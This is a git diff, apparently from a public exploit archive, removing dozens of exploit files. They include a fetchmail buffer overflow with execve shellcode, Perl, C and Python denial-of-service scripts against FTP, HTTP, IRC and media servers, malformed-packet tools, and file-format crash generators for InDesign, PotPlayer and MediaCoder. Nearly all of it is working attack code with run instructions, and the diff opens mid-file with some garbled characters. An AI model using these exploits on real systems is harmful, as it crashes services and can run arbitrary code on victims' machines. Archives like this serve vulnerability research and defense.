SHELL_PTR to 0xAAAAAAAA - * and use gdb to obtain the proof that your fetchmail is vulnerable - * without to exploit it. - * Or just read the code in pop3.c. - * - * To improve the exploit portability you may put the shellcode inside - * one of the static char buffers, grep 'static char' *.c. - * - * Tested on fetchmail 5.8.15 running on Linux 2.4.6 - * - * On success you should see the ls output. 
- */ - -#include - -#define MESSAGES 10 -#define RETR_OFFSET -20 -#define SHELL_PTR 0xbfffba94 - -int main(void) -{ - int ish = SHELL_PTR; - int ret_offset = -10; - char shellcode[] = /* take the shellcode multiple of 4 in size */ - "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" - "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" - "\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0"; - int *sc = (int*) shellcode; - int noop = 0x90909090; - int i; - - /* +OK for user and password, than report the number of messages */ - printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES); - /* Overwrite the RET pointer */ - for (i = ret_offset-20; i < ret_offset+20; i++) - printf("%d %d\r\n", i, ish); - /* Put some NOP */ - for (i = 1; i < 21; i++) - printf("%d %d\r\n", i, noop); - /* Put the shell code in the buffer */ - for (i = 21; i < 21+(sizeof(shellcode)/4); i++) - printf("%d %d\r\n", i, *sc++); - printf(".\r\n"); /* POP data term */ - return 0; -} diff --git a/platforms/unix/remote/21261.txt b/platforms/unix/remote/21261.txt deleted file mode 100755 index 70e7d4576..000000000 --- a/platforms/unix/remote/21261.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/4011/info - -It has been reported that Tru64 systems may be prone to a denial of service condition when handling malformed TCP packets. - -Specifically, when processing a malformed TCP packet with both the SYN and FIN flags set, vulnerable Tru64 systems may block indefinitely, thus causing a denial of service. As a result other legitimate users may no longer be capable of accessing remote services. - -This vulnerability is said to affect Tru64 4.0E as well as various versions of Digital Unix and VxWorks. - -hping2 -a -SPF -p 21 -c 1 \ No newline at end of file diff --git a/platforms/windows/dos/13817.pl b/platforms/windows/dos/13817.pl deleted file mode 100755 index f848baccf..000000000 --- a/platforms/windows/dos/13817.pl +++ /dev/null 
@@ -1,73 +0,0 @@ -#!/usr/bin/perl -# -# Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability -# -# Vendor: Adobe Systems Inc. -# -# Product Web Page: http://www.adobe.com -# -# Version tested: CS3 10.0 -# -# Summary: Adobe® InDesign® CS3 software provides precise control over -# typography and built-in creative tools for designing, preflighting, -# and publishing documents for print, online, or to mobile devices. Include -# interactivity, animation, video, and sound in page layouts to fully engage -# readers. -# -# Desc: When parsing .indd files to the application, it crashes instantly -# overwriting memory registers. Depending on the offset, EBP, EDI, EDX and -# ESI gets overwritten. Pottential vulnerability use is arbitrary code execution -# and denial of service. -# -# -# Tested on Microsoft Windows XP Professional SP3 (English) -# -# -# -# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic -# -# liquidworm gmail com -# -# Zero Science Lab - http://www.zeroscience.mk -# -# 16.09.2009 -# -# -# -# Vendor status: -# -# [16.09.2009] Vulnerability discovered. -# [09.03.2010] Vulnerability reported to vendor with sent PoC files. -# [21.03.2010] Asked confirmation from the vendor. -# [21.03.2010] Vendor asked for PoC files due to communication errors. -# [22.03.2010] Re-sent PoC files to vendor. -# [04.04.2010] Vendor confirms vulnerability. -# [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out. -# [04.06.2010] Public advisory released. -# -# -# Zero Science Lab Advisory ID: ZSL-2010-4941 -# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php -# -# -# -# Raw PoC code: -# - -$header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01"; - -$fn = "teppei.indd"; - -$bof = "\x41" x 10000; - -print "\n\n[*] Creating PoC file: $fn ...\r\n"; - -sleep(1); - -open(indd, ">./$fn") || die "\n\aCannot open $fn : $!"; - -print indd "$header" . 
"$bof"; - -close (indd); - -print "\n[*] PoC file successfully created!\r\n"; \ No newline at end of file diff --git a/platforms/windows/dos/22817.pl b/platforms/windows/dos/22817.pl deleted file mode 100755 index 694f49cc9..000000000 --- a/platforms/windows/dos/22817.pl +++ /dev/null @@ -1,33 +0,0 @@ -source: http://www.securityfocus.com/bid/8010/info - -MyServer HTTP server has been reported prone to a remote denial of service attack. - -The issue presents itself, likely due to a lack of sufficient bounds checking, performed on arguments that are supplied via malicious HTTP GET requests. It has been reported that a remote attacker may invoke a malicious HTTP GET request containing excessive data, that will supposedly trigger a segmentation fault in the server executable and the software will fail. - -#!/usr/bin/perl - -#Myserver 0.4.1 Remote Denial of service ;) -#oh joy... -#deadbeat, uk2sec -#eip@oakey.no-ip.com -#deadbeat@sdf.lonestar.org - -use IO::Socket; -$dos = "//"x100; -$request = "GET $dos"."HTTP/1.0\r\n\r\n"; - -$target = $ARGV[0]; - -print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n"; -print "deadbeat, uk2sec..\n"; -print "usage: perl $0 \n"; -$sox = IO::Socket::INET->new( - Proto=>"tcp", - PeerPort=>"80", - PeerAddr=>"$target" -)or die "\nCan't connect to $target..\n"; -print $sox $request; -sleep 2; -close $sox; -print "Done...\n"; - diff --git a/platforms/windows/dos/24738.c b/platforms/windows/dos/24738.c deleted file mode 100755 index 25c4dc1e1..000000000 --- a/platforms/windows/dos/24738.c +++ /dev/null 
@@ -1,88 +0,0 @@ -source: http://www.securityfocus.com/bid/11677/info - -NetNote server is reported prone to a remote denial of service vulnerability. This issue occurs because the application does not handle exceptional conditions properly. - -NetNote server 2.2 build 230 is reported vulnerable to this issue, however, it is likely that other versions are affected as well. - -*/ -� -#include "winsock2.h" -#include "fstream.h" -� -#pragma comment(lib, "ws2_32") -� - -static char payload[100]; -� -char crash[]="\x90\x90\x90\x90\x20\x20\x20\x20"; -� -void usage(char* us); -WSADATA wsadata; -void ver(); -� -int main(int argc,char *argv[]) -{ -�ver(); -�if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>1)){usage(argv[0]);return -1;} -�if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "< + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/5817.pl b/platforms/windows/dos/5817.pl deleted file mode 100755 index ba6396107..000000000 --- a/platforms/windows/dos/5817.pl +++ /dev/null 
@@ -1,38 +0,0 @@ -- Dana IRC <= 1.3 Remote Buffer Overflow POC/Crash - - - Discovered On: 14 JUNE 2008 - Discovered By: t0pP8uZz - - Download: diebestenbits.de - - - - Info - - - Dana Irc client suffers from a remote buffer overflow, sending a buffer of around 2k - overwrites the EIP therefor crashes the client. The reason why there isnt any shellcode here - is because the client is coverting the junk/buffer data to unicode so its corrupting the shellcode - ive tried sending unicode buffer but the same problem occurs. - - if anyone else can get further please let me know. but i doubt you can. - - there are also other registers you can overwrite using diffrent junk data to overflow them. - - the peice of perl code below will listen on port 6667 and when a Dana IRC client connects - it will crash the client. its also possible to send the data direct to the user. - - peace, t0pP8uZz - -#!/usr/bin/perl - -use IO::Socket; - -$sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '6667', Listen => SOMAXCONN, Reuse => 1 ); - -$jnk = "%n"x1000; -print "Running.."; -while($client = $sock->accept()) { - print $client "$jnk\r\n"; - print "Crashed Client!\n"; -} - -# milw0rm.com [2008-06-14] diff --git a/platforms/windows/local/19974.c b/platforms/windows/local/19974.c deleted file mode 100755 index ca0b2c0a2..000000000 --- a/platforms/windows/local/19974.c +++ /dev/null 
@@ -1,76 +0,0 @@ -source: http://www.securityfocus.com/bid/1282/info - -Windows Media Encoder is part of Windows Media Services. It's purpose is to convert content into a suitable format for video or audio streaming through the Media Services. - -If a specially malformed request is sent to the Windows Media Encoder it could cause the service to crash. The service would need to be restarted in order to regain normal functionality. - -/* - * - * Media Streaming Broadcast Distribution (MSBD) - * Denial of Service Attack - * - * (C) 2000 Kit Knox - Public Release: 05/31/00 - * - * Causes the Windows Media Encoder to crash with a "Runtime Error!" - * - * "NSREX caused an invalid page fault in module MFC42.DLL at 0177:5f4012a1". - * - * Tested on version 4.1.0.3920 file "NsRex.exe" 998KB 1/11/00. - * - * Official Microsoft patch is available : - * - * http://www.microsoft.com/technet/security/bulletin/ms00-038.asp - * - * Thanks to Microsoft and the WMT group for their prompt attention to this - * matter. 
- * - */ - -#include -#include -#include -#include -#include -#include -#include -#include - -char bogus_msbd_packet1[] = { -0x4d, 0x53, 0x42, 0x20, 0x06, 0x01, 0x07, 0x00, 0x24, 0x00, 0x00, 0x40, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x4e, 0x00, -0x65, 0x00, 0x74, 0x00, 0x00, 0x50, 0x53, 0x00, 0x68, 0x00, 0x6f, 0x00, -0x77, 0x00, 0x00, 0x00 -}; - -int sock; - -int main(int argc, char *argv[]) { - struct hostent *he; - struct sockaddr_in sa; - char buf[1024]; - - if (argc != 2) { - fprintf(stderr, "usage: %s \n", argv[0]); - return(-1); - } - - sock = socket ( AF_INET, SOCK_STREAM, 0); - sa.sin_family = AF_INET; - sa.sin_port = htons(7007); - he = gethostbyname (argv[1]); - if (!he) { - if ((sa.sin_addr.s_addr = inet_addr(argv[1])) == INADDR_NONE) - return(-1); - } else { - bcopy(he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length); - } - if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) { - fprintf(stderr, "Fatal Error: Can't connect to Windows Media Encoder.\n"); - return(-1); - } - write(sock, bogus_msbd_packet1, sizeof(bogus_msbd_packet1)); - for (;;) { - read(sock, buf, sizeof(buf)); - } -} - diff --git a/platforms/windows/local/20432.txt b/platforms/windows/local/20432.txt deleted file mode 100755 index 0e0277109..000000000 --- a/platforms/windows/local/20432.txt +++ /dev/null 
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/1999/info
-
-Network Associates WebShield SMTP is an email virus scanner designed for internet gateways.
-
-In the event that WebShield SMTP receives an outgoing email containing six "%20" followed by any character within the recipient field, the application will crash, resulting in an access violation error upon processing of the email. Restarting WebShield SMTP is required in order to regain normal functionality. It has been unverified as to whether or not arbitrary code can be executed on the target system if specially crafted code is inserted into the buffer.
-
-recipient@f%20f%20f%20f%20f%20f%20f
\ No newline at end of file
diff --git a/platforms/windows/local/20589.c b/platforms/windows/local/20589.c
deleted file mode 100755
index e27d8be7d..000000000
--- a/platforms/windows/local/20589.c
+++ /dev/null
@@ -1,123 +0,0 @@ -source: http://www.securityfocus.com/bid/2278/info - -A maliciously-formed packet sent to Iris by a remote attacker, upon opening in the program for analysis by a user, will cause Iris to terminate. - -The crash is caused by an inability of Iris to handle packets with malformed values in its headers. - -/* Denial of Service attack against : - * Iris The Network Traffic Analyzer beta 1.01 - * ------------------------------------------------ - * - * Will create an incorrect packet which will cause - * Iris to hang when it is opened by a user. - * - * Vulnerability found by : grazer@digit-labs.org - * Exploit code by : grazer@digit-labs.org - * - * Respect to the guys from eEye, for there fast - * response. - * - * greetings to hit2000, hwa, synnergy, security.is - * digit-labs. - * - * ---------------> free sk8!!!! <----------------- - * - * ------------------------------------------------ - * http://www.digit-labs.org - * grazer@digit-labs.org - * ------------------------------------------------ - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int build_packet(int sfd, u_long srcaddr, u_long dstaddr); - -struct pseudo { -u_long saddr; -u_long daddr; -u_char zero; -u_char protocol; -u_short length; -}; - -int main(int argc,char **argv){ -int rawfd, check, one=1; - -struct sockaddr_in raddr; -struct in_addr source_ip, desti_ip; -struct ip *ip; -struct tcphdr *tcp; - - while (argc<3) { - fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]"); - fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] ); exit(0);} - - fprintf(stderr, "\nStarting Iris DoS...\n"); - if((check=gethostbyname(argv[2])==NULL)) { - fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); } - - source_ip.s_addr= inet_addr(argv[1]); - desti_ip.s_addr = inet_addr(argv[2]); - - if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) { - fprintf(stderr, "\n You need root for this.."); - exit(0); } - - setsockopt(rawfd, 
IPPROTO_IP, IP_HDRINCL, &one, 1); - - build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr); - - close(rawfd); -return 1; } - - -int build_packet(int sfd, u_long srcaddr, u_long dstaddr) { - -u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)]; -struct sockaddr_in sin; -struct in_addr src_inaddr, dest_inaddr; -struct ip *ip = (struct ip *) packet; -struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip)); -struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip) -+ sizeof(struct pseudo)); - - bzero(packet, sizeof(packet)); - bzero(&sin,sizeof(sin)); - - src_inaddr.s_addr = srcaddr; - dest_inaddr.s_addr = dstaddr; - - pseudo->saddr = srcaddr; - pseudo->daddr = dstaddr; - pseudo->zero = 1; - pseudo->protocol=IPPROTO_TCP; - pseudo->length = htons(sizeof (struct tcphdr)); - - ip->ip_v = -1; - ip->ip_hl = -1; - ip->ip_id = -1; - ip->ip_src = src_inaddr; - ip->ip_dst = dest_inaddr; - ip->ip_p = IPPROTO_TCP; - ip->ip_ttl = 40; - ip->ip_off = -1; - ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr); - tcp->seq = htonl(rand()); - tcp->ack = htonl(rand()); - - sin.sin_family=AF_INET; - sin.sin_addr.s_addr=dstaddr; - sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0, - (struct sockaddr *) &sin,sizeof(sin)); - - fprintf(stderr, "\n Packet send... \n\n" ); - - return 1;} diff --git a/platforms/windows/local/24411.c b/platforms/windows/local/24411.c deleted file mode 100755 index d2857a57b..000000000 --- a/platforms/windows/local/24411.c +++ /dev/null 
@@ -1,40 +0,0 @@ -source: http://www.securityfocus.com/bid/11042/info - -Regmon is reported prone to a local denial of service vulnerability. This issue presents itself because the application fails to handle exceptional conditions and references unvalidated pointers to kernel functions. - -Successful exploitation may allow a local unauthorized attacker to cause a denial of service condition in the application. The attacker may then obfuscate changes to the registry from the administrator and carry out further attacks against a vulnerable computer. - -Regmon 6.11 for NT/9x and prior versions are reportedly affected by this issue. - -/* - * ntregmon-dos.c (up to 6.11) - * - * Copyright (c) 2002-2004 By Next Generation Security S.L. - * All rights reserved - * http://www.ngsec.com - * - * Compiles with: cl ntregmon-dos.c - * - * Madrid, August 2004 - */ - -#include - -#define MY_NULL 0x01 -typedef DWORD (* zwsetvaluekey_TYPE)(DWORD KeyHandle, DWORD ValueName, DWORD TitleIndex, DWORD Type, DWORD Data, DWORD DataSize); - - -int main(int argc, char *argv[]) { -HINSTANCE dll; -zwsetvaluekey_TYPE my_ZwSetValueKey; - - if ((dll=LoadLibrary("ntdll.dll"))!=NULL) { - - if ((my_ZwSetValueKey=(zwsetvaluekey_TYPE)GetProcAddress(dll,"ZwSetValueKey"))!=NULL) { - - my_ZwSetValueKey(MY_NULL,MY_NULL,MY_NULL,MY_NULL,MY_NULL,MY_NULL); - - } - } - -} diff --git a/platforms/windows/local/25268.txt b/platforms/windows/local/25268.txt deleted file mode 100755 index ce7b04ef3..000000000 --- a/platforms/windows/local/25268.txt +++ /dev/null 
@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/12889/info
-
-Microsoft Windows XP is prone to a remote denial of service vulnerability. This issue can allow a remote unauthorized user to shutdown an affected computer.
-
-A remote attacker uses the TSShutdn.exe command to restart or shutdown a computer.
-
-It should be noted that the exploitation of this vulnerability may require the attacker to be part of the same domain. This BID will be updated when more information is available.
-
-Microsoft Windows XP Service Pack 1 is affected by this issue.
-
-Tsshutdn 0 /SERVER:yyyzzz /DELAY:0
\ No newline at end of file
diff --git a/platforms/windows/local/26690.c b/platforms/windows/local/26690.c
deleted file mode 100755
index 882820f33..000000000
--- a/platforms/windows/local/26690.c
+++ /dev/null
@@ -1,177 +0,0 @@ -source: http://www.securityfocus.com/bid/15671/info - -Microsoft Windows is prone to a local denial of service vulnerability. This issue can allow an attacker to trigger a system wide denial of service condition or terminate arbitrary processes. - -Reports indicate that a process can call the 'CreateRemoteThread' function to trigger this issue. - -It was reported that this attack can be carried out by a local unprivileged user. - -#include -#include -#include - -BOOL exploit(char* chProcessName) -{ - - HANDLE hProcessSnap = NULL; - - HANDLE hProcess = NULL; - - BOOL bFound = FALSE; - - BOOL bRet = FALSE; - - PROCESSENTRY32 pe32 = {0}; - - UINT uExitCode = 0; - - DWORD dwExitCode = 0; - - LPDWORD lpExitCode = &dwExitCode; - - - - - - hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); - - if (hProcessSnap == INVALID_HANDLE_VALUE) - return (FALSE); - - pe32.dwSize = sizeof(PROCESSENTRY32); - - printf("\n[+] Search For Process ... \n"); - - - while(!bFound && Process32Next(hProcessSnap, &pe32)) - { - if(lstrcmpi(pe32.szExeFile, chProcessName) == 0) - bFound = TRUE; - - } - - CloseHandle(hProcessSnap); - - if(!bFound){ - - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED| FOREGROUND_INTENSITY) ; - - - printf("[-] Sorry Process Not Find \n"); - - return(FALSE); - - } - printf("[+] Process Find \n"); - - hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); - - - if(hProcess == NULL){ - - - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED| FOREGROUND_INTENSITY) ; - - - printf("[-] Sorry Write Access Denied for This Process \n"); - printf("[-] Exploit Failed :( \n"); - - return(FALSE); - } - - - printf("[+] Write Access Is allowed \n"); - - printf("[+] Send Exploit To Process ...\n"); - - CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void *))100,0,0,0); - - printf("[+] Successful :)\n"); - - - return(pe32.th32ProcessID); -} - -int main(int argc,char **argv) -{ -char* 
chProcess = argv[1]; - - COORD coordScreen = { 0, 0 }; - DWORD cCharsWritten; - CONSOLE_SCREEN_BUFFER_INFO csbi; - DWORD dwConSize; - HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE); - - GetConsoleScreenBufferInfo(hConsole, &csbi); - dwConSize = csbi.dwSize.X * csbi.dwSize.Y; - FillConsoleOutputCharacter(hConsole, TEXT(' '), dwConSize, - coordScreen, &cCharsWritten); - GetConsoleScreenBufferInfo(hConsole, &csbi); - FillConsoleOutputAttribute(hConsole, csbi.wAttributes, dwConSize, - coordScreen, &cCharsWritten); - SetConsoleCursorPosition(hConsole, coordScreen); - - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_GREEN| FOREGROUND_INTENSITY) ; - - - if(argc < 2) { - - - printf("\n"); - printf(" - ========================================================================== \n"); - printf(" > Microsoft Windows CreateRemoteThread - Exploit < \n"); - printf(" > BUG Find By Q7X ( Nima Salehi ) Q7X@Ashiyane.com - < \n"); - - printf(" > Exploited By Q7X ( Nima Salehi ) - Q7X@Ashiyane.com < \n"); - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED | FOREGROUND_INTENSITY|FOREGROUND_GREEN|FOREGROUND_BLUE); - - - printf(" > Compile : cl -o nima.c ( Win32/VC++ ) - < \n"); - - printf(" > Usage : nima.exe Process - < \n"); - printf(" > Example : nima.exe explorer.exe - < \n"); - printf(" > Tested on : Windows XP (SP0 ,SP1 ,SP2) , Windows 2000 - AdvServer (SP4) < \n"); - printf(" > Windows 2000 Server (SP4), Windows 2003 (SP0 , - SP1) < \n"); - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED| FOREGROUND_INTENSITY) ; - - printf(" > Copyright 2002-2005 By Ashiyane Digital Network - Security Team < \n"); - printf(" > www.Ashiyane.com ( Free ) www.Ashiyane.net ( Not - Free ) < \n"); - - printf(" > Special Tanx To My Best Friend Behrooz_Ice - < \n"); - - printf(" - ========================================================================== \n"); - - - } - else - - exploit(chProcess); - - - - - - 
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),
- FOREGROUND_RED |FOREGROUND_GREEN|FOREGROUND_BLUE);
-
-
-}
-
diff --git a/platforms/windows/local/28227.txt b/platforms/windows/local/28227.txt
deleted file mode 100755
index 6ca37e683..000000000
--- a/platforms/windows/local/28227.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/18995/info
-
-Microsoft Windows is prone to a denial-of-service vulnerability.
-
-This issue occurs when a program calls certain API calls for manipulating Windows registry keys. This may crash the affected computer.
-
-NOTE: This BID has been revised (July 3, 2007); the issue was originally thought to be a vulnerability in Symantec Norton Personal Firewall, but further investigation reveals a problem in an underlying OS API.
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28227.zip
\ No newline at end of file
diff --git a/platforms/windows/local/30308.py b/platforms/windows/local/30308.py
deleted file mode 100755
index 00c5c7cae..000000000
--- a/platforms/windows/local/30308.py
+++ /dev/null
@@ -1,48 +0,0 @@ -########################################################### -#[~] Exploit Title:PotPlayer 1.5.42509 Beta - DOS(Integer Division by Zero -#Exploit) -#[~] Author: sajith -#[~] version: PotPlayer 1.5.42509 Beta -#[~]Vendor Homepage: http://daumpotplayer.com/ -#[~] Tested in: Windows XP SP3 -#[~] vulnerable app link:http://daumpotplayer.com/download/ -########################################################### - -#POC: -#------- -#!/usr/bin/python -raw_input("Hit Enter to create a malicious file") - -f = open("victim.wav","w") - -header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" -"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" -"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" -"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") -f.write(header) - -print "[#] File created by sajith shetty" - -raw_input("Hit enter to exit") -#----- -''' -(694.4d8): Integer divide-by-zero - code c0000094 (first chance) -First chance exceptions are reported before any exception handling. -This exception may be expected and handled. 
-eax=ffffffff ebx=040e0be0 ecx=00000000 edx=00000000 esi=ffffffff -edi=0021977a -eip=748fe82c esp=0131f2a0 ebp=0131f334 iopl=0 nv up ei pl zr na pe -nc -cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 -efl=00010246 -''' \ No newline at end of file diff --git a/platforms/windows/local/35530.py b/platforms/windows/local/35530.py deleted file mode 100755 index 63443d765..000000000 --- a/platforms/windows/local/35530.py +++ /dev/null @@ -1,24 +0,0 @@ -# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u) -# Date: 11/29/2010 -# Author: Hadji Samir s-dz@hotmail.fr -# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe -# Version: 0.8.33 build 5680 - - EAX 0012E508 - ECX 43434343 - EDX 00000000 - EBX 43434343 - ESP 0012E4A4 - EBP 0012E4F4 - ESI 0012E508 - EDI 00000000 - -#!/usr/bin/python -buffer = ("http://" + "A" * 845) -nseh = ("B" * 4) -seh = ("C" * 4) -junk = ("D" * 60) - -f= open("exploit.m3u",'w') -f.write(buffer + nseh + seh + junk) -f.close() \ No newline at end of file diff --git a/platforms/windows/local/35531.py b/platforms/windows/local/35531.py deleted file mode 100755 index 8f86c07c6..000000000 --- a/platforms/windows/local/35531.py +++ /dev/null @@ -1,25 +0,0 @@ -# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst) -# Date: 11/29/2010 -# Author: Hadji Samir s-dz@hotmail.fr -# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe -# Version: 0.8.33 build 5680 - - EAX 0012E788 - ECX 43434343 - EDX 00000000 - EBX 43434343 - ESP 0012E724 - EBP 0012E774 - ESI 0012E788 - EDI 00000000 - -#!/usr/bin/python - -buffer = ("http://" + "A" * 845) -nseh = ("B" * 4) -seh = ("C" * 4) -junk = ("D" * 60) - -f= open("exploit.lst",'w') -f.write(buffer + nseh + seh + junk) -f.close() \ No newline at end of file diff --git a/platforms/windows/local/35532.py b/platforms/windows/local/35532.py deleted file mode 100755 index cc8390422..000000000 
--- a/platforms/windows/local/35532.py +++ /dev/null @@ -1,47 +0,0 @@ -# jaangle 0.98i.977 Denial of Service Vulnerability -# Author: hadji samir , s-dz@hotmail.fr -# Download : http://www.jaangle.com/downloading?block -# Tested : Windows 7 (fr) -# DATE : 2012-12-13 -# - -################################################################### - - -EAX 000000C0 -ECX 00000000 -EDX 00000000 -EBX 00000003 -ESP 01C5FE28 -EBP 01C5FF88 -ESI 00000002 -EDI 002B4A98 -EIP 776964F4 ntdll.KiFastSystemCallRet -C 0 ES 0023 32bit 0(FFFFFFFF) -P 1 CS 001B 32bit 0(FFFFFFFF) -A 0 SS 0023 32bit 0(FFFFFFFF) -Z 0 DS 0023 32bit 0(FFFFFFFF) -S 0 FS 003B 32bit 7FFDC000(8000) -T 0 GS 0000 NULL -D 0 -O 0 LastErr ERROR_SUCCESS (00000000) -EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G) -ST0 empty g -ST1 empty g -ST2 empty g -ST3 empty g -ST4 empty g -ST5 empty g -ST6 empty g -ST7 empty g - 3 2 1 0 E S P U O Z D I -FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) -FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 - -#!/usr/bin/python - -buff = ("\x41" * 30000 ) - -f = open("exploit.m3u",'w') -f.write( buff ) -f.close() \ No newline at end of file diff --git a/platforms/windows/local/9871.txt b/platforms/windows/local/9871.txt deleted file mode 100755 index b9cf8e66a..000000000 --- a/platforms/windows/local/9871.txt +++ /dev/null @@ -1,22 +0,0 @@ -############################################################################# -# -# Boloto Media Player 1.0.0.9 Local (.PLS) Crash PoC -# Found By: Dr_IDE -# Download: http://www.tucows.com/preview/602821 -# Tested On: XPSP3 -# Note: It locks hard if you add this file to the playlist and click. -# -############################################################################# - -buff = ("\x41" * 5000) - -try: - f1 = open("evil.pls","w"); - f1.write("[playlist]\nNumberOfFiles=3\n\nFile1=http://" + buff); - f1.close(); - -except: - print ("[-] Error. File couldn't be created."); - - -#[pocoftheday.blogspot.com] 
diff --git a/platforms/windows/remote/10073.py b/platforms/windows/remote/10073.py deleted file mode 100755 index 50b2e74d4..000000000 --- a/platforms/windows/remote/10073.py +++ /dev/null @@ -1,47 +0,0 @@ -#!/usr/bin/python -print "\n###############################################################" -print "## Iranian Pentesters Home ##" -print "## Www.Pentesters.Ir ##" -print "## PLATEN -[ H.jafari ]- ##" -print "## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##" -print "## http://www.dxm2008.com/data/ftpserversetup.exe ##" -print "## author: PLATEN ##" -print "## E-mail && blog: ##" -print "## hjafari.blogspot.com ##" -print "## platen.secure[at]gmail[dot]com ##" -print "## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##" -print "## and all members in Pentesters.ir ##" -print "############################################################### \n" -import socket -import sys - -def Usage(): - print ("Usage: ./expl.py \n") -buffer= "./A" * 6300 -subme() -def start(hostname, username, passwd): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - try: - sock.connect((hostname, 21)) - except: - print ("[-] Connection error!") - sys.exit(1) - r=sock.recv(1024) - print "[+] " + r - sock.send("user %s\r\n" %username) - r=sock.recv(1024) - sock.send("pass %s\r\n" %passwd) - r=sock.recv(1024) - print "[+] Send evil string" - sock.send("nlst %s\r\n" %buffer) - sock.close() - -if len(sys.argv) <> 4: - Usage() - sys.exit(1) -else: - hostname=sys.argv[1] - username=sys.argv[2] - passwd=sys.argv[3] - start(hostname,username,passwd) - sys.exit(0) diff --git a/platforms/windows/remote/1183.c b/platforms/windows/remote/1183.c index c2b6e68fd..c874f8897 100755 --- a/platforms/windows/remote/1183.c +++ b/platforms/windows/remote/1183.c @@ -481,6 +481,6 @@ u_int resolv(char *host) { perror("\nError"); exit(1); } -#endif - -// milw0rm.com [2005-08-29] +#endif + +// milw0rm.com [2005-08-29] 
